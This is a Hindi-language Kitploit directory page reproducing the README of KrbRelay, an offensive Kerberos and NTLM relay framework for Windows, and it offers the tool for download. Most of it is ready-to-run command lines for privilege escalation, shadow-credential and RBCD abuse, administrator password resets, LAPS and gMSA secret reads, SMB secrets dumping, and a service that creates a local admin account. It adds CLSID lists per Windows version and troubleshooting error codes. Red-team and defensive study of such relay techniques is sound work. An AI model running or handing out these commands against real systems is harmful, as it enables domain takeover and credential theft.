Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
KrbRelay — विंडोज वातावरण के लिए केर्बेरोस रिले फ्रेमवर्क जो LDAP, SMB, HTTP और RPC प्रोटोकॉल के माध्यम से प्रमाणीकरण रिले, विशेषाधिकार वृद्धि और पार्श्व आंदोलन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/cube0x0/krbrelay
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनप्रमाणीकरणरेड टीमिंग
GitHubcube0x0/krbrelay

KrbRelay

विंडोज वातावरण के लिए केर्बेरोस रिले फ्रेमवर्क जो LDAP, SMB, HTTP और RPC प्रोटोकॉल के माध्यम से प्रमाणीकरण रिले, विशेषाधिकार वृद्धि और पार्श्व आंदोलन को सक्षम बनाता है।

रिपॉजिटरी देखें
953131634 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

KrbRelay

तीन सिर वाले कुत्तों को रिले करना। अधिक जानकारी https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html और https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html पर उपलब्ध है।

यह अधिकांश पूरी तरह से पैच किए गए Windows सिस्टम पर काम करना चाहिए। लैब वातावरण में Server OS के साथ कठिनाइयाँ हो सकती हैं क्योंकि फ़ायरवॉल OXID रिज़ॉल्वर को ब्लॉक कर सकता है, हालाँकि, वास्तविक जीवन के अभियानों के दौरान यह संभवतः कोई समस्या नहीं होगी, CLSIDs के लिए भी यही बात लागू होती है।

image-20220213094644590

समर्थित प्रोटोकॉल और सुविधाएँ

कुछ प्रोटोकॉल दूसरों की तुलना में अधिक पूर्ण हैं, PR का स्वागत है।

  • LLMNR

  • LDAP/LDAPS

  • HTTP

    • EWS
  • SMBv2

  • RPC over SMB

    • MS-SAMR
    • MS-SCMR
    • MS-RPRN
    • MS-RRP
    • MS-LSAT/MS-LSAD

उदाहरण

root@kitploit:~
# LPE
.\KrbRelay.exe -spn ldap/dc01.htb.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606
.\KrbRelay.exe -spn ldap/dc01.htb.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred

# Cross-Session LDAP
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred win2016$
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606 win2016$
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember srv_admins domain_user
.\KrbRelay.exe -spn ldap/dc01.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -laps
.\KrbRelay.exe -spn ldap/dc02.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -gmsa
.\KrbRelay.exe -spn ldap/dc02.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -reset-password administrator Password123!

# Cross-Session HTTP
.\KrbRelay.exe -spn http/exchange.htb.local -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-search beta,test
.\KrbRelay.exe -spn http/exchange.htb.local -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-delegate [email protected]
.\KrbRelay.exe -spn http/win2016.htb.local -endpoint iisstart.htm -proxy -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182

# Cross-Session SMB
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-privileges (([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value)
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -secrets 
.\KrbRelay.exe -spn cifs/win2016.htb.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -service-add addUser "C:\windows\system32\cmd.exe /c """"C:\windows\system32\net user cube Password123! /add && C:\windows\system32\net localgroup administrators cube /add"""""

# LLMNR
.\KrbRelay.exe -llmnr -spn 'cifs/win2019.htb.local' -secrets

# NTLM (CLSIDs के लिए https://github.com/antonioCoco/RemotePotato0 देखें)
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm -downgrade

CheckPort.exe एक C# टूल है जिसका उपयोग OXID रिज़ॉल्वर के लिए उपलब्ध पोर्ट खोजने के लिए किया जा सकता है।

root@kitploit:~
C:\Users\domain_user\Desktop\KrbRelay\CheckPort\bin\Release\CheckPort.exe
[*] Looking for available ports..
[*] Port: 1024 is available

CLSIDs

हमें अपने OBJREF को एक ऐसी प्रक्रिया के अंदर अनमार्शल करने की आवश्यकता होगी जो नेटवर्क पर प्रमाणीकरण की अनुमति दे, इसे Impersonation Level देखकर सत्यापित किया जा सकता है:

  • RPC_C_IMP_LEVEL_DEFAULT # काम नहीं करेगा
  • RPC_C_IMP_LEVEL_ANONYMOUS # काम नहीं करेगा
  • RPC_C_IMP_LEVEL_IDENTIFY # LDAP के लिए काम करता है
  • RPC_C_IMP_LEVEL_IMPERSONATE # SMB के लिए आवश्यक
  • RPC_C_IMP_LEVEL_DELEGATE

जब LDAP या किसी अन्य सेवा पर रिले कर रहे हैं जिसमें साइनिंग सक्षम है लेकिन अनिवार्य नहीं है, तो हमें यह भी सत्यापित करना होगा कि प्रक्रिया का Authentication Level RPC_C_AUTHN_LEVEL_CONNECT पर सेट है।

NT Authority\Network service के अंतर्गत चलने वाली प्रक्रियाएँ नेटवर्क पर प्रमाणीकरण करते समय SYSTEM खाते का उपयोग करेंगी।

CLSIDs खोजने का उपकरण: https://github.com/tyranid/oleviewdotnet

root@kitploit:~
Import-Module .\OleViewDotNet.psd1
Get-ComDatabase -SetCurrent
$comdb = Get-CurrentComDatabase
$clsids = (Get-ComClass).clsid
Get-ComProcess -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | select ProcessId,ExecutablePath,Name,AppId,User,AuthnLevel,ImpLevel

Windows 10 1903

root@kitploit:~
# SYSTEM रिले
0bae55fc-479f-45c2-972e-e951be72c0c1 # RPC_C_IMP_LEVEL_IDENTIFY
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE 

# Cross-Session रिले
0289a7c5-91bf-4547-81ae-fec91a89dec5 # RPC_C_IMP_LEVEL_IMPERSONATE 
1f87137d-0e7c-44d5-8c73-4effb68962f2 # RPC_C_IMP_LEVEL_IMPERSONATE 
73e709ea-5d93-4b2e-bbb0-99b7938da9e4 # RPC_C_IMP_LEVEL_IMPERSONATE 
9678f47f-2435-475c-b24a-4606f8161c16 # RPC_C_IMP_LEVEL_IMPERSONATE 
9acf41ed-d457-4cc1-941b-ab02c26e4686 # RPC_C_IMP_LEVEL_IMPERSONATE 
ce0e0be8-cf56-4577-9577-34cc96ac087c # RPC_C_IMP_LEVEL_IMPERSONATE 

Server 2019

root@kitploit:~
# SYSTEM रिले
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE

# Cross-Session रिले
354ff91b-5e49-4bdc-a8e6-1cb6c6877182 # RPC_C_IMP_LEVEL_IMPERSONATE 
38e441fb-3d16-422f-8750-b2dacec5cefc # RPC_C_IMP_LEVEL_IMPERSONATE 
f8842f8e-dafe-4b37-9d38-4e0714a61149 # RPC_C_IMP_LEVEL_IMPERSONATE 

Server 2016

root@kitploit:~
# SYSTEM रिले
90f18417-f0f1-484e-9d3c-59dceee5dbd8 # RPC_C_IMP_LEVEL_IMPERSONATE

# Cross-Session रिले
0289a7c5-91bf-4547-81ae-fec91a89dec5 # RPC_C_IMP_LEVEL_IMPERSONATE
1f87137d-0e7c-44d5-8c73-4effb68962f2 # RPC_C_IMP_LEVEL_IMPERSONATE
5f7f3f7b-1177-4d4b-b1db-bc6f671b8f25 # RPC_C_IMP_LEVEL_IMPERSONATE
73e709ea-5d93-4b2e-bbb0-99b7938da9e4 # RPC_C_IMP_LEVEL_IMPERSONATE
9678f47f-2435-475c-b24a-4606f8161c16 # RPC_C_IMP_LEVEL_IMPERSONATE
98068995-54d2-4136-9bc9-6dbcb0a4683f # RPC_C_IMP_LEVEL_IMPERSONATE
9acf41ed-d457-4cc1-941b-ab02c26e4686 # RPC_C_IMP_LEVEL_IMPERSONATE
bdb57ff2-79b9-4205-9447-f5fe85f37312 # RPC_C_IMP_LEVEL_IMPERSONATE
ce0e0be8-cf56-4577-9577-34cc96ac087c # RPC_C_IMP_LEVEL_IMPERSONATE

त्रुटि कोड

पहली बार काम नहीं कर रहा है? फिर से प्रयास करें और फिर इन त्रुटि कोडों की जाँच करें, और यदि आप एक Issue खोलने जा रहे हैं, तो कृपया पूरा आउटपुट और इनपुट पेस्ट करें।

फ़ायरवॉल OXID रिज़ॉल्वर को ब्लॉक कर रहा है

root@kitploit:~
System.Runtime.InteropServices.COMException (0x800706BA): The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)

गलत CLSID

root@kitploit:~
System.Runtime.InteropServices.COMException (0x80080004): Bad path to object (Exception from HRESULT: 0x80080004 (CO_E_BAD_PATH))

या

root@kitploit:~
System.Runtime.InteropServices.COMException (0x80070422): The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. (Exception from HRESULT: 0x80070422)

Kerberos समस्याएँ (प्रमाणीकरण प्रकार पहचाना नहीं गया), रिबूट/घड़ी सिंक के बाद काम करेगा

root@kitploit:~
System.Runtime.InteropServices.COMException (0x800706D3): The authentication service is unknown.

एक वैध apReq 0x60 से शुरू होता है, अपने वातावरण और पैरामीटर जाँचें

root@kitploit:~
[*] apReq: 05000b0710000000db003300020<SNIP>

CLSID प्रतिरूपण स्तर या प्रमाणीकरण स्तर बहुत कम है

root@kitploit:~
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
System.UnauthorizedAccessException: Access is denied.

Access is denied.

आभार

  • Vletoux RPCForSMBLibrary शुरू करने के लिए
  • James Forshaw Kerberos रिलेइंग प्रस्तुत करने और NtApiDotNet के लिए
  • TalAloni SMBLibrary के लिए
  • MichaelGrafnetter DSInternals के लिए
  • Kevin Robertson Inveigh के लिए
  • decoder_it और splinter_code RemotePotato0 के लिए
टूल डाउनलोड करें